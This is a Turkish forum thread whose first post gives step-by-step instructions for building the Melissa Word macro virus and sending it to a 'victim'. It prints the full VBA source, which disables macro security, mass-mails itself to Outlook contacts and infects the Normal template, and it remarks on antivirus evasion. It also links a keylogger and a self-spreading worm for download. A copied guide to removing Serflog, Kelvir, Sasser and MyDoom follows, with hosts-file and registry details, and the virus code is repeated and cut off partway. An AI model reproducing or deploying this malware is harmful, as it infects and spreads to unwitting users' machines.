İnTeRNeT TeKNoNoJi KuRuMLaRı FoRMu
Merhaba arakadaşlar iletişim için
lütfen üye olunuz
İnTeRNeT TeKNoNoJi KuRuMLaRı FoRMu
Merhaba arakadaşlar iletişim için
lütfen üye olunuz
İnTeRNeT TeKNoNoJi KuRuMLaRı FoRMu
Would you like to react to this message? Create an account in a few clicks or log in to continue.

İnTeRNeT TeKNoNoJi KuRuMLaRı FoRMu

..::Bir Forum Olmakla --261-- SeRuVeNCiNiN meKaNıYıZ::..
 
AnasayfaAnasayfa  GaleriGaleri  AramaArama  Latest imagesLatest images  Kayıt OlKayıt Ol  Giriş yapGiriş yap  

melisa virüsü

Önceki başlık Sonraki başlık Aşağa gitmek
Yazar Mesaj
UmuT-21
!!..WeBMaSTeR..!!
!!..WeBMaSTeR..!!
UmuT-21
Erkek
Yaş : 34
Kayıt tarihi : 08/12/07
Mesaj Sayısı : 2051
Bulunduğunuz İl : Önemli olan burda olmak
Meslek/Hobi : Öğrenci
Tuttuğunuz Takım : Adminin takımı olmaz(en azından burda)

melisa virüsü Vide
MesajKonu: melisa virüsü melisa virüsü EmptyAralık 8th 2007, 13:55

Bu Virus icin ozel temizleme araclari bile yaptilar bu virus klasiktir 2-3 Sene once dunyayi calkaladi.Kisaca Mahvetti diyeyim size.etkili virustur.Dikkatli kullanin.
Bir Microsoft Word Belgesi Acalim

Bos Belge acildiginda Alt + f11 Tuslarina Basalim Visual Basic Acilacaktir.
Project 1 / Microsoft Word objects / This Document Acilacaktir

This Document Seciniz Ve icine Melisa Virusu Kodlari YAziniz Ve Kaydet CTRL + S Tuslarina basiniz Ve Visual Basic uygulamasini kapatiniz.
Word Belgesini Kaydedin Ve Cikin

Melisa Virusu Executable EXe calismasi degildir Virus Sadece makro Virusudur Ve kurbaniniz bUnu kesinlikle yer.Exe uzantisi olmadigindan dolayi kabul edecektir.
Ancak panda ve Norton da denedim ikiside virus olrak buluyor.Avast Virus olarak bulmuyor dikkatinizi cekeyim bu konuya.
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\\\\\\\

Kod:


Private Sub Document_Open() ' Writted By eXit
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\W ord\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabl ed = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\W ord\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\" , "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\" , "Melissa?") = "... by Kwyjibo"
End If


Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If

If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If

If DoNT <> True And DoAD <> True Then GoTo CYA

If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If

If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If

CYA:

If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True
End If

If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub
• Yorum yaz!

18/8/2006 - Sağ tıklama Hk
Yazan isimsiz
30/7/2006 - Uber Keyboard Logger ||Keylogger|
Nasıl yükleneceği ve kaldırılacağına ilişkin bilgi dosyanın içinde mevcuttur. Boyutu son derece küçük ve anti keyloggerların durduramadığı bir program...

http://maleboge.siyahsapka.org/downloads/uberlog.zip

• 0 Yorum • Yorum yaz! • Bağlantı

30/7/2006 - S1LV3R mouse Trap
kurban programa tıkladıında mouse kafayı sıyırır..program bir worm gibi kendini kopyalar..silinmesi çok zordur...denemeyin

http://rapidshare.de/files/11855837/...etrap.rar.html
• 0 Yorum • Yorum yaz! • Bağlantı

30/7/2006 - W32.Serflog.A ve W32.Kelvir-A virüsü
32.Serflog.A ve W32.Kelvir-A virüsü temizlenmesi

W32.Serflog.A bir worm (solucan) olup, MSN Messenger ve Windows Messenger üzerinden bilgisayarına virüs bulaşmış kişinin contact list'indeki tüm kişilere kendisini bir link olarak gönderir ve Windows'un güvenlik seviyesi ayarlarını da azaltır.

Diğer isimleri: Sumom.A [F-Secure], IM-Worm.Win32.Sumom.a [Kaspersky Lab], W32.Crog.worm [McAfee], W32.Sumom-A [Sophos], WORM_FATSO.A [Trend Micro].

Bilgisayara bulaşır bulaşmaz ekrana şunu yazar: "'-F-u-c-k-'-Y-o-u-'". Virüs kendisini aşağıdaki isimleri kullanarak bilgisayarda çoğaltır:

formatsys.exe (C:\System dizini)
serbw.exe (C:\System dizini)
msmbw.exe (C:\Windows dizini)
Crazy frog gets killed by train!.pif (C:\ sürücüsünde)
Annoying crazy frog getting killed.pif (C:\ sürücüsünde)
See my lesbian friends.pif (C:\ sürücüsünde)
LOL that ur pic!.pif (C:\ sürücüsünde)
My new photo!.pif (C:\ sürücüsünde)
Me on holiday!.pif (C:\ sürücüsünde)
The Cat And The Fan piccy.pif (C:\ sürücüsünde)
How a Blonde Eats a Banana...pif (C:\ sürücüsünde)
Mona Lisa Wants Her Smile Back.pif (C:\ sürücüsünde)
Topless in Mini Skirt! lol.pif (C:\ sürücüsünde)
Fat Elvis! lol.pif (C:\ sürücüsünde)
Jennifer Lopez.scr (C:\ sürücüsünde)
lspt.exe (C:\ sürücüsünde)
autorun.exe (C:\Documents and Settings\\Local Settings\Application Data\Microsoft\CD Burning dizini)

Aşağıdaki gizli dosyaları oluşturur:
British National Party.jpg (C:\ sürücüsünde)
Crazy-Frog.Html (C:\ sürücüsünde)
Message to n00b LARISSA.txt (C:\ sürücüsünde)

Eğer bilgisayarda var ise aşağıdaki dosyayı siler:
MESSAGE_TO_BROPIA.txt

Virüs,
"Messenger Plus! 3.50.exe", "MSN all version polygamy.exe" ve "MSN nudge bomb.exe" isimlerini kullanarak,

My Shared dizinine (C: sürücüsünde)
Shared dizinine (C: sürücüsünde) ve
C:\ProgramFiles\Program Files\eMule\Incoming dizinine kendisini kopyalar. Daha sonra aşağıdaki Internet adreslerini bloke ederek kişinin antivirüs yazılımları indirmesini ya da yüklü antivirüs programlarını güncellemesini engelleyerek kendisini sağlama alır:

64.233.167.104 www.symantec.com
64.233.167.104 www.sophos.com
64.233.167.104 www.mcafee.com
64.233.167.104 www.viruslist.com
64.233.167.104 www.f-secure.com
64.233.167.104 www.avp.com
64.233.167.104 www.kaspersky.com
64.233.167.104 www.networkassociates.com
64.233.167.104 www.ca.com
64.233.167.104 www.my-etrust.com
64.233.167.104 www.nai.com
64.233.167.104 www.trendmicro.com
64.233.167.104 www.grisoft.com
64.233.167.104 securityresponse.symantec.com
64.233.167.104 symantec.com
64.233.167.104 sophos.com
64.233.167.104 mcafee.com
64.233.167.104 update.symantec.com
64.233.167.104 liveupdate.symantecliveupdate.com
64.233.167.104 viruslist.com
64.233.167.104 f-secure.com
64.233.167.104 kaspersky.com
64.233.167.104 kaspersky-labs.com
64.233.167.104 avp.com
64.233.167.104 nai.com
64.233.167.104 networkassociates.com
64.233.167.104 ca.com
64.233.167.104 mast.mcafee.com
64.233.167.104 my-etrust.com
64.233.167.104 download.mcafee.com
64.233.167.104 dispatch.mcafee.com
64.233.167.104 secure.nai.com
64.233.167.104 updates.symantec.com
64.233.167.104 us.mcafee.com
64.233.167.104 liveupdate.symantec.com
64.233.167.104 customer.symantec.com
64.233.167.104 rads.mcafee.com
64.233.167.104 trendmicro.com
64.233.167.104 grisoft.com
64.233.167.104 sandbox.norman.no
64.233.167.104 www.pandasoftware.com
64.233.167.104 uk.trendmicro-europe.com


Symantec firmasına ait Norton Anti-virüs yüklü bilgisayarlardan virüsü temizlemek için bilgisayarı güvenli kipte açmalısınız. System Restore (Sistem Geri Yüklemeyi) kapatmalısınız. Güncellemenizi yaptıktan sonra, Norton Antivirüs ile bilgisayarınızı scan edip bütün "W32.Serflog.A" solucanlarını temizlemelisiniz.

Norton Antivirüs yoksa, virüsü elle temizlemek için:
1. Bilgisayarınızı restart edip güvenli kipte açın. Bunun için açılış anında F8 tuşuna basarak güvenli kipi seçin.
2. Başlat menüsünden RUN'ı (çalıştır) seçip açılan pencereye "regedit" yazın, sonra da enter’a basın.
3. Regedit programı içinde aşağıdaki alt anahtarları inceleyin ve bunlar içinde virüsle ilgili eklenmiş yeni kayıtları silin:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServices
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\policies\Explorer\Run
HKEY_CURRENT_USER\Microsoft\Windows\CurrentVersion \Run
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Curre ntVersion\policies\Explorer\Run

Yukarıdaki kayıtlar içinde "serpe", "avnort", "ltwob" gibi tanımlar var ise sisteminiz virüsten etkilenmiş ve her açılışta kendisini tekrar çalıştırıyor demektir. Bu tanımları silin.

4. "Bilgisayarım"ı açtıktan sonra "araçlar"dan dizin seçenekleri menüsünü açın ve görüntü bölümündeki "gizli dosyaları göster" seçeneğini seçin ve bilinen dosya tipleri için dosya uzantısını gösterme seçeneğindeki işareti
kaldırın. Böylelikle virüs'ün sistem içinde gizli dosya olarak kopyalanmış türevlerini görebileceksiniz.

5. Aşağıdaki dizinlerde isimleri verilen dosyaları bilgisayarınızdan silin.
C:\windows\system32\formatsys.exe
C:\windows\system32\serbw.exe
C:\windows\msmbw.exe
C:\Crazy frog gets killed by train!.pif
C:\Annoying crazy frog getting killed.pif
C:\See my lesbian friends.pif
C:\LOL that ur pic!.pif
C:\My new photo!.pif
C:\Me on holiday!.pif
C:\The Cat And The Fan piccy.pif
C:\How a Blonde Eats a Banana...pif
C:\Mona Lisa Wants Her Smile Back.pif
C:\Topless in Mini Skirt! lol.pif
C:\Fat Elvis! lol.pif
C:\Jennifer Lopez.scr
C:\lspt.exe
C:\Documents and Settings\\Local Settings\Application Data\Microsoft\CD Burning\autorun.exe
C:\British National Party.jpg
C:\Crazy-Frog.Html
C:\Message to n00b LARISSA.txt

6. C:\Windows\System32\Drivers\etc altındaki hosts dosyasını edit edin ve 64.233.167.104 veya benzeri IP adresleri için yeni tanımlanmış adres bilgilerini silin.
Örnek içerik:
64.233.167.104 www.symantec.com
64.233.167.104 www.sophos.com
64.233.167.104 www.mcafee.com
64.233.167.104 www.viruslist.com
64.233.167.104 www.f-secure.com
64.233.167.104 www.avp.com
64.233.167.104 www.kaspersky.com

7. Bu ve benzeri antivirüs üreticilerinin adreslerini içeren satırların tümünü silin. Böylelikle antivirüs yazılımınız yeni güncellemeleri indirebilir hale gelecektir. Yukarıdaki işlemlerden sonra bilgisayarınızı yeniden başlatıp antivirüs yazılımını Internet’e bağlanarak güncelleyin ve gözden kaçmış kalıntılar olabileceğini düşünerek bilgisayarınızı virüs taramasından geçirin. Windows XP'nin System Restore (Sistem Geri Yükleme) özelliğini mutlaka kapatmalısınız. Sistem Geri Yüklemeyi eğer devredışı bırakırsanız W32 türevi pekçok zararlı solucanı ve virüsün bilgisayarınızda çalışmasının tetiklenmesini engellemiş olacaksınız. Sistem Geri Yükleme özelliğine Başlat/Ayarlar/Denetim Masası'ından "Sistem Geri Yükleme" sekmesinden ulaşabilirsiniz. Sistem Geri Yüklemeyi devredışı bırakıp Sistem'den çıktığınızda Windows sizi uyaracaktır. Windows'un uyarısına aldırmayarak devam edin.

KORUNMA: Sistem Restore (Sistem Geri Yükleme) neden kapatılmalı?
Sistem Geri Yükleme, Windows ME ve Windows XP'deki bir özellik olup kullanıcı tarafından seçilmiş dosyaların yedeklenmesi amacıyla tasarlanmıştır. Windows bu yedeklemeyi C:\_Restore dizininde yapar. Yedeklenmiş dosyaları Windows özel bir algoritmayla sıkıştırarak yedeklediğinden, antivirüs yazılımları buradaki virüslü dosyalar göremezler. Siz bilgisayarındaki buradaki hariç tüm virüsleri temizledikten sonra eski belgenizi bir süre sonra restore ederek geri çağırdığınızda, dosyalarınızla birlikte yedeklenmiş virüsler de geri geleceğinden sistem geri yükleme kapatılmalıdır. Demek ki geri yüklemenin kapatılması için iki sebebimiz var:

- Sistem Geri Yüklemenin yedeklediği dosyaları antivirüs yazılımları göremez.
- Geri yedeklenen virüslü dosyalar virüsleri de geri getirirler.

Bu özelliği açık tutmak virüsleri çok sevindirecek, sizi de çok uğraştıracaktır.

TEMİZLEME: W32.Kelvir, W/32Serflog ve diğer solucanları temizlemek için ftp dizinindeki programları kullanabilirsiniz.Buradaki FxKelvir.exe, FixSerflog.exe, FixSobigF.exe, FxBropia.exe ve W32.Sobig.F@mm Removal Tool.exe programlarını deneyin. McAfee'nin Stinger antivirüs yazılımının en son versiyonu da ftp dizinindedir. Diğer solucanlar için bilgisayarınızı tarayabilirsiniz.
Sayfa başına dön Aşağa gitmek
http://www.intekfrm.com
UmuT-21
!!..WeBMaSTeR..!!
!!..WeBMaSTeR..!!
UmuT-21
Erkek
Yaş : 34
Kayıt tarihi : 08/12/07
Mesaj Sayısı : 2051
Bulunduğunuz İl : Önemli olan burda olmak
Meslek/Hobi : Öğrenci
Tuttuğunuz Takım : Adminin takımı olmaz(en azından burda)

melisa virüsü Vide
MesajKonu: Geri: melisa virüsü melisa virüsü EmptyAralık 8th 2007, 13:56

W32.Kelvir-A-E ise yine bir worm (solucan) olup, MSN Messenger ve Windows Messenger üzerinden bilgisayarına virüs bulaşmış kişinin contact list'indeki tüm kişilere kendisini bir link olarak gönderir ve "W32.Spybot.Worm" virüsünün değişik bir versiyonunu download edip bilgisayara bulaştırmaya çalışır. Virüs'ün download etmeye çalıştığı dosyanın yeri: http://home.comcast.net/*******/patch.exe olup güvenlik açısından adrese ulaşımı engellemek için bir kısmı yıldızlarla gizlenmiştir. Virüs bu adreste bulunan "patch.exe" dosyasını download eder etmez ilk iş bunu çalıştırır. Bu yazı hazırlanırken adresteki virüs değişmiş ve "Win32.Rbot.BWD" olmuştur. Daha çok bilgi için Bilgisayar Komisyonu üyeleri şu an yoğun olarak çalışılmaktadır.

Solucanın diğer isimleri: Win32.Bropia.Variant!Worm, W32.Kelvir.A [F-Secure], IM-Worm.Win32.Kelvir.a [Kaspersky].

Virüsü elle temizleme:
Symantec firmasına ait Norton Anti-virüs yüklü bilgisayarlardan virüsü temizlemek için bilgisayarı güvenli kipte açmalısınız. System Restore (Sistem Geri Yüklemeyi) kapatmalısınız. Norton Antivirüs ile bilgisayarınızı scan edip bütün "W32.Kelvir-C" solucanlarını temizlemelisiniz.


--------------------------------------------------------------------------------

"Stinger AVERT" kullanarak diğer solucanlardan bilgisayarı temizleme:
Stinger yazılımı McAfee firmasına ait küçük bir antivirüs yazılımı olup aşağıdaki virüsleri temizler:
BackDoor-AQJ, BackDoor-CFB, BackDoor-DHC, BackDoor-JZ-JZ, Bat/Mumu.worm, Exploit-DcomRpc, IPCScan, IRC/Flood.ap, NutzenSie, IRC/Flood.cd, NTServiceLoader, PWS-Narod, PWS-Sincom.dll, W32.Anig.worm, W32.Bagle@MM, W32.Blaster.worm, (Lovsan), W32.Bugbear@MM, W32.Deborm.worm.gen, W32.Doomjuice.worm, W32.Dumaru, W32.Elkern.cav, W32.Fizzer.gen@MM, W32.FunLove, W32.Klez, W32.Korgo.worm, W32.Lirva, W32.Lovgate, W32.Mimail, W32.MoFei.worm, W32.Mumu.b.worm, W32.MyDoom, W32.Nachi.worm, W32.Netsky, W32.Nimda, W32.Pate, W32.Polybot, W32.Sasser.worm, W32.SirCam@MM, W32.Sober, W32.Sobig, W32.SQLSlammer.worm, W32.Swen@MM, W32.Yaha@MM, W32.Zafi, W32.Zindos.worm.

Not: Stinger programı bütün Windows işletim sistemlerinde çalışan küçük bir programdır. Lisanssız olup Freeware'dir. W32.Serflog.A ve W32.Kelvir-A solucanlarını temizlemez! Diğer solucanları temizleyebilirsiniz. Güncellenmiş en son sürümünü download etmek için buraya tıklayın.


--------------------------------------------------------------------------------


Bugünlerde etkin diğer virüsler ve elle temizlenmeleri:

W32.Aplore@mm
Start-Run-Type "msconfig"
Click "startup"
Uncheck "Explorer"
Restart computer

Choke.exe (I-Worm.Choke)
Press CTRL-ALT-DEL, select "choke.exe" and select "end task"
Close MSN Messenger
Start-Run-Type "msconfig"
Click "startup"
Uncheck "Choke.exe"
Restart computer

Choke.exe (I-Worm.Choke)
Start-Find-Search "Choke.exe"
Select file and delete
Empty the Rcycle bin

PIC1234(1)(1)(1)(1)(1).exe Virus
Close MSN
Goto Start-Run-Type "msconfig"
Click "startup"
Uncheck "MSN Messenger"
Click OK and choose DO NOT RESTART
CTRL-ALT-DEL, select "MsgSpread" and end the task

PIC1234(1)(1)(1)(1)(1).exe" Virus
Go to desktop and open My Documents
Double click on "Messenger Service Received Files"
Select the file "PIC1234(1)(1)(1)(1)(1).exe" and delete it.
Empty Recycle Bin
Restart computer



--------------------------------------------------------------------------------

Hazırlayan: Dr. Levent Yurga
08.03.2005

Yararlanılan kaynaklar:
Symantec Antivirüs Sitesindeki Asuka Yamamoto'nun yazısı
Sophos Antivirüs Sitesi
Kaspersky Antivirüs Sitesi
Antivir Antivirüs Sitesi
F-Secure Antivirüs Sitesi
IT Güvenlik Uzmanı Ömer Kurtulmuş'un yazısı (inTellect Bilgisayar)
CA Virus Information Center
Symantec Virus Removal Tools Page [Tüm trojan, solucan ve virüsler için download edilebilir küçük temizleme programları]


--------------------------------------------------------------------------------



DİĞER WORM VİRÜSLERİ İLE İLGİLİ TEMiZLEME PROGRAMLARI VE BİLGİ:

W32 Sasser Worm Virüsü:
W32 Sasser worm virüsü A, B, C, D, E ve F şeklinde varyasyonlar halinde bulunur ve bilgisayara bulaşır. Microsoft'un MS04-011 numaralı güvenlik bülteninde açıklandığı üzere Windows'ta bulunan LSASS (Local Security Authority Subsystem Service) servis programının güvenlik açıklarını tarayarak, bulduğu açıklardan file transfer protokolünü kullanarak (FTP) kendisini başka bilgisayarlara kopyalar. Bunun için seçtiği rastgele IP'lerde tarama yapar. Güvenlik Patch dosyaları yüklenmemiş NT, 2000 ve XP işletim sistemi yüklü bilgisayarlara bulaşır. Win95/98/Me bilgisayarlara da bulaşır fakat aktif hale geçmez. XP ve 2000 bilgisayarlarda "Bilgisayarın kapanmasına 1 dakika var" yazısı ekrana çıkarak bilgisayarı kapatır. Bu 1 dakika içinde virüsü temizlemek mümkün olmadığı için sistem tarihini geçici olarak birkaç gün/ay geri atabilirsiniz. Bulaştığı makinanın Windows dizininde natpatch.exe dosyası oluşturur ve bunu registry'deki HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run kısmına ekler. Böylece her Windows'u başlattığınızda virüs aktif hale geçer. Virüsün aktifliğine son vermek için CTRL-ALT-DEL tuşuna bastığınızda gelen TASK MANAGER'de PROCESS kısmına geçin. Listedeki natpatch.exe'yi bulun, üzerine tıklayıp process'ine son verin. W32 Sasser virüsü için Symantec Antivirüs firması fxsasser.exe dosyasını kullanıcıların hizmetine sundu. Bu dosya ile (bilgisayarınızı kesinlikle güvenli kipte açtıktan sonra) virüsü temizleyin. Türkçe XP bilgisayarlar için hazırlanmış update dosyalarını bilgisayarınıza patch etmelisiniz. Bunun için service pack 2'yi kurmanız yeterlidir.

W32 Sasser Virüsünü temizlemek için adım adım yapılacak işler (NT, 2000 ve XP):
1. Bilgisayarınızı baştan başlatın ve güvenli kipte açın (açılış sırasında F8'e basacaksınız)
2. Fxsasser ya da Fsasser programıyla bilgisayarınızda virüsü aratın
3. Bilgisayarınızı kapatın açın (Normal olarak)
4. Service pack 2'yi kurun
5. Kurduktan sonra bilgisayarınızı baştan başlatıp virüsü tekrar arayın.
6. Sisteminizdeki anti-virüs'ü güncelleyin.



W32 Cycle virüsü ise LSASS güvenlik sisteminin buffer overrun açığı ile kendisini yayar. 2000 ve XP bilgisayarlara bulaşır. Virüsün aktifliğine son vermek için System Restore programının çalışmasına son vermelisiniz. Task Manager ile baktığınızda msblast.exe, avserve.exe, avserve2.exe veya skynetave.exe programlarını görürseniz bilgisayarınıza W32 Cycle worm virüsü bulaşmış demektir.

W32 Sasser E virüsü için registry editörü çalştırıp (regedit) lsasss.exe satırını bulup silmelisiniz. Registry'deki yeri:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run \LSASS SVR = lsasss.exe



MyDoom Virüsü
E-mail ile yayılan bir spam mail worm virüsü olup bulaştığı bilgisayarlardaki outlook adres defterine musallat oluyor. Buradaki adreslere virüslü mailler gönderirken içerik olarak rastgele konular seçiyor. Maillere attachment olarak küçük bir .zip dosyası ekleyerek zararsız görünümlü bir içerik ile kullanıcıları aldatmaya çalışıyor. .bat, .cmd, .exe, .pif ve .scr uzantılı mail ekleri yaratıyor. Kazaa gibi servislerle yayılması dizayn edildiğinden bu servislerden gelen dosyalarda bulunma ihtimali yüksek. Klavyeyi kontrol eden bir virüs olduğundan klavyeden girilen kredi kartı bilgileri ve şifreleri bilgisayarda kendisine özel bir dosyada saklayıp yeri gelince bu bilgileri maille yollayamaya çalışıyor. MyDoom virüsünü temizleyen programı ftp sunucumuzdan download edebilirsiniz.





XP Bilgisayarınızdaki "System Restore" servisini iptal ederek W32 Sasser ve benzeri virüslerin bilgisayardaki işlevlerine son verme ve engelleme:
1. Masaüstündeki "Bilgisayarım" simgesine sağ tuşla tıklayın ve oradan "Sistem Geri Yükleme"yi seçin.
2. "Bütün sürücüler'deki sistem geri yüklemeyi kapat" kutucuğunu işaretleyin.
3. Tamam'a tıklayın, gelen uyarıya tamam deyin.



XP'de eğer bir dosyayı silmeye kalktığınızda "Bu dosya başka bir application tarafından kullanılıyor" deyip silmiyorsa ve o dosyayı başka bir programın kullanmadığından eminseniz yapacağız iş:
Kısa yol, çabuk çözüm 1:
1. Dosyanın ismini değiştirin, uzantısını da değiştirin. Mesela "a.a" yapabilirsiniz.
(Windows Explorer'da dosya uzantılarını gizle seçeneği aktif ise bunu yapamazsınız)
2. Sonra dosyayı silebilirsiniz.
3. Eğer Windows dosyanın ismini değiştirmenize izin vermez ise dosyayı silmek için aşağıdakini deneyin:

Kısa yol, çabuk çözüm 2:
1. Başlat'tan "cmd"yi çalıştırın.
2. Silinecek dosyanın ismi uzun ise klasörde "dir /x" yazarak kısa ismini içinde "~" olacak şekilde görün.
(Ör. "MatrixRevolutions2.avi" dosyasını dir/x ile "matrixr~1.avi" olarak göreceksiniz.)
3. Del /f yazarak kısa dosya isminin kısa halini yazarak dosyayı silin.
(Ör. Del /f matrixr~1.avi)

Uzun yol, kesin çözüm 3 (En inatçı dosyalar için):
1. CTRL-ALT-DEL yaparak Task Manager'i çalıştırın ve "explorer.exe"nin çalışmasına son verin (desktop silinecektir!)
2. Task Manager'deki Dosya kısmından "Yeni Görev (Çalıştır)"ı seçip oraya "cmd" ya da "command" yazın.
3. Silmek istediğiniz sürücüye ve klasöre gidin.
4. "del" komutuyla dosyayı silin.
5. Task Manager'deki Dosya kısmına "Yeni Görev (Çalıştır)"ı seçip oraya "explorer" yazıp enter'a bastığınızda desktop geri gelecektir.
6. Dosyayı silmiş oldunuz, en inatçı dosyaları bile silebilirsiniz.
• 0 Yorum • Yorum yaz! • Bağlantı

30/7/2006 - Mouse Clicklerini yakalayan Trojan PWSteal-Bancos-Q
PWSteal-Bancos-Q sadece klavye den basilanlari degil mouse hareketlerinide kaydedip upload edebilen ozelliklerle donatilmis.

Daha onceleride VB-HV gibi ekran goruntulerini yakalayan bir trojanlar vardi. Bu sefer durum daha ciddi.

Bu yeni trojan sadece klavye den basilanlari degil mouse hareketlerinide kaydedip upload edebilen ozelliklerle donatilmis.

PWSteal-Bancos-Q Avusturalyali bir anti virus sirketi olan PC TOOLS tarafindan anons edildi cevrede bir cok turevlerinin olacagindan supheleniliyor kaydettigi klavye basi$larini ve mouse hareketlerini ftp protokolu uzerinden tasiyan trojan ozellikle finans sektorundeki sanal klavye uygulamalarini gecmek icin tasarlanmis. Henuz ne kadar basarili oldugu kesinlesmemis olsada virus/trojan yazarlari icin yeni bir cigir acacagi ifadesinde bulunuluyor.

daha fazla bilgi icin

http://www.theregister.co.uk/2006/03...turing_trojan/
http://securityresponse.symantec.com....bancos.q.html
http://www.sophos.com/virusinfo/analyses/trojvbhv.html
• 0 Yorum • Yorum yaz! • Bağlantı

30/7/2006 - Melisa Virusu !!
Bu Virus icin ozel temizleme araclari bile yaptilar bu virus klasiktir 2-3 Sene once dunyayi calkaladi.Kisaca Mahvetti diyeyim size.etkili virustur.Dikkatli kullanin.
Bir Microsoft Word Belgesi Acalim

Bos Belge acildiginda Alt + f11 Tuslarina Basalim Visual Basic Acilacaktir.
Project 1 / Microsoft Word objects / This Document Acilacaktir

This Document Seciniz Ve icine Melisa Virusu Kodlari YAziniz Ve Kaydet CTRL + S Tuslarina basiniz Ve Visual Basic uygulamasini kapatiniz.
Word Belgesini Kaydedin Ve Cikin

Melisa Virusu Executable EXe calismasi degildir Virus Sadece makro Virusudur Ve kurbaniniz bUnu kesinlikle yer.Exe uzantisi olmadigindan dolayi kabul edecektir.
Ancak panda ve Norton da denedim ikiside virus olrak buluyor.Avast Virus olarak bulmuyor dikkatinizi cekeyim bu konuya.
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\\\\\\\

Kod:


Private Sub Document_Open() ' Writted By eXit
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\W ord\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabl ed = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\W ord\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\" , "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\" , "Melissa?") = "... by Kwyjibo"
End If


Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
